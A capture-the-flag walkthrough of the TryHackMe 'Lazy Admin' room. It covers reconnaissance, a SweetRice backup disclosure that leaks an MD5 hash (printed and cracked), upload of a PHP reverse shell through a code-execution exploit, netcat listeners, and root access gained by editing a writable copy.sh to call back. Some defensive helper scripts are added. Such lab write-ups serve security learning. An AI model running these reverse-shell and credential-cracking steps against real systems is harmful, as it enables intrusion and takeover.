Tryhackme.com – Lazy Admin challenge notes

URL: https://tryhackme.com/room/lazyadmin

If you’re going to be doing a lot of CTF challenges then it might be worth adding the following function to your .zshrc or .bashrc using:

The first command appends the function to your .zshrc file (the same works for .bashrc).

The second command reloads your .zshrc so the new function is defined in the current shell.

The third command is just a sanity check that the function is now there.

Now to create a thm directory with the challenge name and cd into it just run:

$ mkcd thm/lazyadmin
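The function body itself is not reproduced on this page, so below is an added example (not the original post's code) of the kind of `mkcd` helper the three steps above install: the function, an idempotent installer that appends it to an rc file only once, and the reload and sanity-check commands as comments. The definition is an assumed one.

```shell
# Added example: a mkcd helper plus an installer for it. The mkcd body is an
# assumption, since the original post's function is not shown on this page.

# Create a directory (parents included) and change into it.
mkcd() {
    mkdir -p -- "$1" && cd -- "$1" || return 1
}

# Append the mkcd definition to a shell rc file (~/.zshrc or ~/.bashrc)
# unless it is already present, so re-running the installer is harmless.
install_mkcd() {
    rcfile="$1"
    if grep -q '^mkcd()' "$rcfile" 2>/dev/null; then
        echo "mkcd already present in $rcfile"
        return 0
    fi
    printf '\n# CTF helper: create a directory and cd into it\nmkcd() { mkdir -p -- "$1" && cd -- "$1" || return 1; }\n' >> "$rcfile"
    echo "mkcd added to $rcfile"
}

# Usage after installing into your rc file:
#   install_mkcd ~/.zshrc   # first command: put the function in place
#   source ~/.zshrc         # second command: reload so the shell sees it
#   type mkcd               # third command: sanity check, prints the body
#   mkcd thm/lazyadmin      # create and enter the challenge directory
```

The `--` after `mkdir -p` and `cd` stops a directory name that starts with a dash from being parsed as an option, which matters when you paste challenge names straight in.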

Let's now start an nmap scan to see what ports are open:

$ nmap -sC -sV -oN nmap-scan $IP

Port 80 is open, so let's have a look in a browser at what it shows:

$ firefox http://$IP

Nothing much really in the source, so let's run gobuster to see what directories it picks up on (the wordlist directory may differ for you):

$ gobuster dir -u http://$IP -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

Let's now scan with nikto. Nikto is a tool that scans web servers and web applications for various security issues, such as outdated software, misconfigurations, known vulnerabilities, and more.

$ nikto -h http://$IP |tee nikto.log

gobuster above has found the directory /content, so let's take a look at that. Sometimes you may have to run Firefox as a non-root user, so you use something like:

$ sudo -u kali firefox http://$IP/content

If not then you can run the following as root:
$ firefox http://$IP/content

We can see that it's running a CMS called SweetRice. You could look to see if there are any version numbers in the source, but on this occasion there is nothing, so let's move on:

$ wget -qO- http://$IP/content | grep -i version

Let's see if there are any exploits for the CMS using searchsploit:

$ searchsploit sweetrice

I can see there is a PHP code execution exploit which looks interesting, so let's have a look at what that is with:

$ searchsploit -x php/webapps/40700.html

The next commands are me grabbing a copy of that exploit (searchsploit -m mirrors it into the current directory, whereas -x only displays it) and renaming it to exploit.html to be used:

$ searchsploit -m php/webapps/40700.html

$ mv 40700.html exploit.html

Now we need to make some changes in that exploit for it to work. Here is the original:

I have adjusted the HTML section so we can use it to test the exploit, by putting in the IP of the target and changing the sweetrice part of the path to /content:

Now let’s test the exploit by opening it in the browser with:

$ firefox exploit.html

But as you can see, it's a portal that requires credentials, so I tried obvious ones like admin:admin, admin:password and admin with an empty password, but none of them worked.

Let's take a look at the other exploits in searchsploit using the same command as before:

The one I have highlighted looks interesting so let’s take a look at this backup disclosure exploit:

Let’s have a gander:

Interesting: it appears that going to that link may show details, so let's give that a go and see what we find:

$ curl http://$IP/content/inc/mysql_backup

There appears to be a hyperlink to a potential SQL file, so let's see if there are any user or password details using:

$ wget -qO- http://$IP/content/inc/mysql_backup/mysql_backup_20191129023059-1.5.sql | grep -Ei 'user|pass'

That looks like the user is <blank> and there is a hash, which I have highlighted. No spoilers, so I have covered the user.

So now I want to check that I have the rockyou.txt wordlist so I can run hashcat against that hash and potentially recover the password:

$ find / -name rockyou.txt

Let's pop that hash into a file called md5.txt for now with the following:
$ echo "42f749ade7f9e195bf475f37a44cafcb" > md5.txt

Then run hashcat against the hash using:
$ hashcat -m 0 -a 0 md5.txt /usr/share/wordlists/rockyou.txt

and there is the password we need. No spoilers, so I have covered the password.
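The hashcat run above works because the backup stores an unsalted MD5, so every candidate word needs only one hash computation and a comparison. The following is an added example (not from the original post) that reduces `hashcat -m 0 -a 0` to a readable shell loop over a constructed wordlist, with a constructed target hash rather than the one from the challenge; it assumes GNU coreutils `md5sum` is available.

```shell
# Added example: what "hashcat -m 0 -a 0" does, as a plain shell loop.
# Mode 0 is raw unsalted MD5; attack 0 is a straight wordlist run.
# All values here are constructed for the demo; the challenge hash is not used.

# MD5 of one candidate word (GNU coreutils md5sum assumed).
md5_of() {
    printf '%s' "$1" | md5sum | cut -d' ' -f1
}

# Try each line of the wordlist against the target hash.
# Prints the matching word and returns 0 on success; returns 1 if no
# word in the list produces the hash, the same outcome as an exhausted run.
md5_dict_check() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')   # hashcat compares case-insensitively
    wordlist="$2"
    while IFS= read -r word || [ -n "$word" ]; do
        if [ "$(md5_of "$word")" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$wordlist"
    return 1
}

# Constructed stand-in for a slice of rockyou.txt.
demo_wordlist() {
    wordlist=$(mktemp)
    printf '%s\n' letmein hello qwerty > "$wordlist"
    printf '%s' "$wordlist"
}

# Usage:
#   wl=$(demo_wordlist)
#   md5_dict_check 5d41402abc4b2a76b9719d911017c592 "$wl"   # prints "hello"
#   md5_dict_check 5f4dcc3b5aa765d61d8327deb882cf99 "$wl"   # "password" is not in the list: exit status 1
```

A salted or iterated password hash would break this loop's economy: the work would have to be redone per salt, and each candidate would cost thousands of iterations instead of one, which is why a leaked backup holding unsalted MD5 is treated as a credential disclosure rather than just an information leak.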

So let's try the exploit in the portal now to see if it allows us to log in and run the exploit:

$ firefox exploit.html

No spoilers so I have covered the username.

Then let's visit the following URL as the exploit suggests:
$ firefox http://$IP/content/inc/ads/hacked.php

But looking at the page, it looks like it hasn't worked.

But if we run the exploit page again, you will see it now shows the script as hacked:

Now let’s try the URL again but using:
$ firefox http://$IP/content/inc/ads/hacked.php

We can see that it exposes a PHP info page with the PHP version and a few other details.

Let's grab a PHP reverse shell and see if we can use it to get a reverse shell on the server:
$ wget -qO- https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php > revshell.php
$ nano revshell.php

Now we need to adjust revshell.php so it has our local IP and a port of your choosing. I decided to use 6666 as always. So I now need to get my local IP:

Here are the lines in the script I have adjusted:

Then copy all of the contents of revshell.php and paste them into the exploit.html file under the PHP tags:

I have also changed the value from “hacked” to “shell”:

Now let’s give that a go again with:
$ firefox exploit.html &

Now we can see the shell has been written, so we can visit it, but first we need to open a listener using netcat:

$ nc -lvnp 6666

Now we can visit our shell using:
$ firefox http://$IP/content/inc/ads/shell.php

Now going back to our listener we have the following:

Now with the shell we can start looking around for flags to answer any challenge questions.

Let's see what files we have in /home/. There is a directory called itguy, and I can see some interesting file names, so I take a look and grab any loot I need.

There is a script called copy.sh and it looks like it can be run, so let's copy what is already in that file and pop in our local IP on a different port so we can start another listener. I have chosen port 5555 for this one and started the listener with:
$ nc -lnvp 5555

Then I can see the root flag and enter it into the challenge tasks.
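The copy.sh step only works because a script that ends up running in a privileged context is editable by an unprivileged user. The page does not say which mechanism runs copy.sh, so the following added example (not from the original post) limits itself to the permission side: a check that lists world-writable files under a directory tree and a fix that strips the write bit, run against a constructed tree rather than the challenge box.

```shell
# Added example: defender-side audit for the misconfiguration the copy.sh step
# relies on. The tree below is constructed for the demo; paths are not from the
# challenge machine.

# List regular files under a directory that others can write to.
# Symlinks are not followed, so a link's own mode is never reported.
find_world_writable() {
    find "$1" -type f -perm -o+w 2>/dev/null | sort
}

# Remove the "others" write bit from a script and confirm it is gone.
fix_script_perms() {
    chmod o-w -- "$1" && [ -z "$(find "$1" -maxdepth 0 -perm -o+w)" ]
}

# Constructed tree: one world-writable script (the problem) and one that is not.
demo_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/home/itguy"
    printf '#!/bin/sh\n' > "$d/home/itguy/copy.sh"
    chmod 0777 "$d/home/itguy/copy.sh"
    printf '#!/bin/sh\n' > "$d/home/itguy/notes.sh"
    chmod 0750 "$d/home/itguy/notes.sh"
    printf '%s' "$d"
}

# Usage:
#   root=$(demo_tree)
#   find_world_writable "$root"                 # prints .../home/itguy/copy.sh
#   fix_script_perms "$root/home/itguy/copy.sh"
#   find_world_writable "$root"                 # prints nothing
```

On a real host the same check is worth running over every path named in sudoers, cron entries and systemd units, since a writable script there is the whole privilege escalation.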
